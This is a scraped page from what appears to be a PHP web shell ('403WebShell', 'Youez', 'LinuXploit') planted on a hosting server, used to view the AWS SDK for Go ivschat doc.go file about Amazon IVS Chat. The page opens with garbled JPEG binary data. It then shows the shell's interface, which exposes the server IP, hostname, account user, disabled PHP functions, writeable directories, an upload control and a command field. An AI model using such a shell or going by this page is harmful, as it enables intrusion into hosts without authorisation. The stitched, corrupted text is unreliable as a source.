JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.113  /  Your IP : 216.73.217.129
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/go/pkg/mod/github.com/aws/aws-sdk-go@v1.55.5/service/ivschat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/go/pkg/mod/github.com/aws/aws-sdk-go@v1.55.5/service/ivschat//doc.go
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.

// Package ivschat provides the client and types for making API
// requests to Amazon Interactive Video Service Chat.
//
// # Introduction
//
// The Amazon IVS Chat control-plane API enables you to create and manage Amazon
// IVS Chat resources. You also need to integrate with the Amazon IVS Chat Messaging
// API (https://docs.aws.amazon.com/ivs/latest/chatmsgapireference/chat-messaging-api.html),
// to enable users to interact with chat rooms in real time.
//
// The API is an AWS regional service. For a list of supported regions and Amazon
// IVS Chat HTTPS service endpoints, see the Amazon IVS Chat information on
// the Amazon IVS page (https://docs.aws.amazon.com/general/latest/gr/ivs.html)
// in the AWS General Reference.
//
// This document describes HTTP operations. There is a separate messaging API
// for managing Chat resources; see the Amazon IVS Chat Messaging API Reference
// (https://docs.aws.amazon.com/ivs/latest/chatmsgapireference/chat-messaging-api.html).
//
// Notes on terminology:
//
//   - You create service applications using the Amazon IVS Chat API. We refer
//     to these as applications.
//
//   - You create front-end client applications (browser and Android/iOS apps)
//     using the Amazon IVS Chat Messaging API. We refer to these as clients.
//
// # Resources
//
// The following resources are part of Amazon IVS Chat:
//
//   - LoggingConfiguration — A configuration that allows customers to store
//     and record sent messages in a chat room. See the Logging Configuration
//     endpoints for more information.
//
//   - Room — The central Amazon IVS Chat resource through which clients
//     connect to and exchange chat messages. See the Room endpoints for more
//     information.
//
// # Tagging
//
// A tag is a metadata label that you assign to an AWS resource. A tag comprises
// a key and a value, both set by you. For example, you might set a tag as topic:nature
// to label a particular video category. See Tagging AWS Resources (https://docs.aws.amazon.com/general/latest/gr/aws_tagging.html)
// for more information, including restrictions that apply to tags and "Tag
// naming limits and requirements"; Amazon IVS Chat has no service-specific
// constraints beyond what is documented there.
//
// Tags can help you identify and organize your AWS resources. For example,
// you can use the same tag for different resources to indicate that they are
// related. You can also use tags to manage access (see Access Tags (https://docs.aws.amazon.com/IAM/latest/UserGuide/access_tags.html)).
//
// The Amazon IVS Chat API has these tag-related endpoints: TagResource, UntagResource,
// and ListTagsForResource. The following resource supports tagging: Room.
//
// At most 50 tags can be applied to a resource.
//
// # API Access Security
//
// Your Amazon IVS Chat applications (service applications and clients) must
// be authenticated and authorized to access Amazon IVS Chat resources. Note
// the differences between these concepts:
//
//   - Authentication is about verifying identity. Requests to the Amazon IVS
//     Chat API must be signed to verify your identity.
//
//   - Authorization is about granting permissions. Your IAM roles need to
//     have permissions for Amazon IVS Chat API requests.
//
// Users (viewers) connect to a room using secure access tokens that you create
// using the CreateChatToken endpoint through the AWS SDK. You call CreateChatToken
// for every user’s chat session, passing identity and authorization information
// about the user.
//
// # Signing API Requests
//
// HTTP API requests must be signed with an AWS SigV4 signature using your AWS
// security credentials. The AWS Command Line Interface (CLI) and the AWS SDKs
// take care of signing the underlying API calls for you. However, if your application
// calls the Amazon IVS Chat HTTP API directly, it’s your responsibility to
// sign the requests.
//
// You generate a signature using valid AWS credentials for an IAM role that
// has permission to perform the requested action. For example, DeleteMessage
// requests must be made using an IAM role that has the ivschat:DeleteMessage
// permission.
//
// For more information:
//
//   - Authentication and generating signatures — See Authenticating Requests
//     (Amazon Web Services Signature Version 4) (https://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-authenticating-requests.html)
//     in the Amazon Web Services General Reference.
//
//   - Managing Amazon IVS permissions — See Identity and Access Management
//     (https://docs.aws.amazon.com/ivs/latest/userguide/security-iam.html) on
//     the Security page of the Amazon IVS User Guide.
//
// Amazon Resource Names (ARNs)
//
// ARNs uniquely identify AWS resources. An ARN is required when you need to
// specify a resource unambiguously across all of AWS, such as in IAM policies
// and API calls. For more information, see Amazon Resource Names (https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html)
// in the AWS General Reference.
//
// See https://docs.aws.amazon.com/goto/WebAPI/ivschat-2020-07-14 for more information on this service.
//
// See ivschat package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/ivschat/
//
// # Using the Client
//
// To contact Amazon Interactive Video Service Chat with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Interactive Video Service Chat client Ivschat for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/ivschat/#New
package ivschat

Youez - 2016 - github.com/yon3zu
LinuXploit